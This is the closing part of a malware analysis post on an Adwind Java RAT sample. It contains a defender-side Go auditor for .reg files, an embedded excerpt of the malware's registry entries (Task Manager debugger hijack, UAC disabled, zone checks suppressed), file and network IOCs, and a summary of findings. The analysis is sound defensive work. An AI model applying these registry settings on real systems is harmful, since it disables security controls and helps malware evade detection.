secondbkup[.]myeffect[.]net, which had no A record. This indicates the domain was taken down, so execution did not proceed to any CnC connection.
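As an added defender-side example (Go, not code from the post), the following parses .reg text of the form dropped above and flags the settings this sample imports: IFEO debugger hijacks of security tools, UAC, Task Manager and System Restore being switched off, and the zone-check suppression. The embedded input is a constructed excerpt of the entries listed above; in practice an analyst would feed it the dropped .reg file or a registry export from the host.

```go
package main

import (
	"bufio"
	"strings"
)

// AuditRegFile walks Windows .reg text ("[key]" headers, then "name"=data lines) and
// returns key\name -> reason for every defence-evasion setting of the kind this sample imports.
func AuditRegFile(reg string) map[string]string {
	findings := map[string]string{}
	key := ""
	sc := bufio.NewScanner(strings.NewReader(reg))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if strings.HasPrefix(line, "[") && strings.HasSuffix(line, "]") {
			key = line[1 : len(line)-1] // new subtree; the values that follow belong to it
		} else if name, data, ok := strings.Cut(line, "="); ok && strings.HasPrefix(name, `"`) {
			name, data = strings.Trim(name, `"`), strings.Trim(data, `"`)
			if reason := classify(key, name, data); reason != "" {
				findings[key+`\`+name] = reason
			}
		}
	}
	return findings
}

// classify encodes the behaviours observed on this page; data "-" means the value is deleted.
func classify(key, name, data string) string {
	zero := data == "dword:00000000"
	switch {
	case strings.Contains(strings.ToLower(key), `\image file execution options\`) && strings.EqualFold(name, "debugger"):
		return "IFEO hijack: starting " + key[strings.LastIndex(key, `\`)+1:] + " launches " + data + " instead"
	case (name == "EnableLUA" || strings.HasPrefix(name, "ConsentPromptBehavior")) && zero:
		return "UAC disabled or elevation without prompt"
	case name == "DisableTaskMgr" && !zero:
		return "Task Manager disabled"
	case (name == "DisableSR" || name == "DisableConfig") && data == "dword:00000001":
		return "System Restore disabled"
	case name == "SEE_MASK_NOZONECHECKS" && data == "1":
		return "Mark-of-the-Web zone checks suppressed"
	case name == "LowRiskFileTypes" && strings.Contains(data, ".jar"):
		return "executable and .jar attachments marked low risk"
	}
	return ""
}

// constructedReg is a handful of entries copied from the .reg file shown on this page, not the whole file.
const constructedReg = `Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Environment]
"SEE_MASK_NOZONECHECKS"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe]
"debugger"="svchost.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000`
```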

IOCs

File IOCs

File Name: BAC.jar
MD5: fd992b7219c34c8c2ff59174b682e3a7
SHA256: 054d36da71223e23740560755c7a5bc2717d2896b98b43805816f3c7b114f15d
File Size: 531,254 B

File Name: _0.58455697052535998057311208249241793.class
MD5: 781fb531354d6f291f1ccab48da6d39f
SHA256: 97d585b6aff62fb4e43e7e6a5f816dcd7a14be11a88b109a9ba9e8cd4c456eb9
File Size: 247,088 B

File Name: .jar.jChWSA
MD5: fd992b7219c34c8c2ff59174b682e3a7
SHA256: 054d36da71223e23740560755c7a5bc2717d2896b98b43805816f3c7b114f15d
File Size: 531,254 B

File Name: lfTQsdJPKb4003450082576532965.reg
MD5: 7f97f5f336944d427c03cc730c636b8f
SHA256: 9613caed306e9a267c62c56506985ef99ea2bee6e11afc185b8133dda37cbc57
File Size: 27,926 B

Network IOCs

Malicious Domain: secondbkup[.]myeffect[.]net
Malicious IP: NA

Summary of Findings

  • The sample is Adwind malware
  • Adwind is a Java RAT distributed as a JAR file
  • Its common behaviour is to use xcopy to copy JRE files to a different location and to drop and execute .class and .vbs files
  • In this sample, detection of monitoring programs and tampering with them was baked in
  • Here the domain had been taken down, so CnC connections were not possible

This post is also available on my Medium: https://medium.com/@sandmaxprime/malware-analysis-adwind-jrat-8f58c66ff7bb
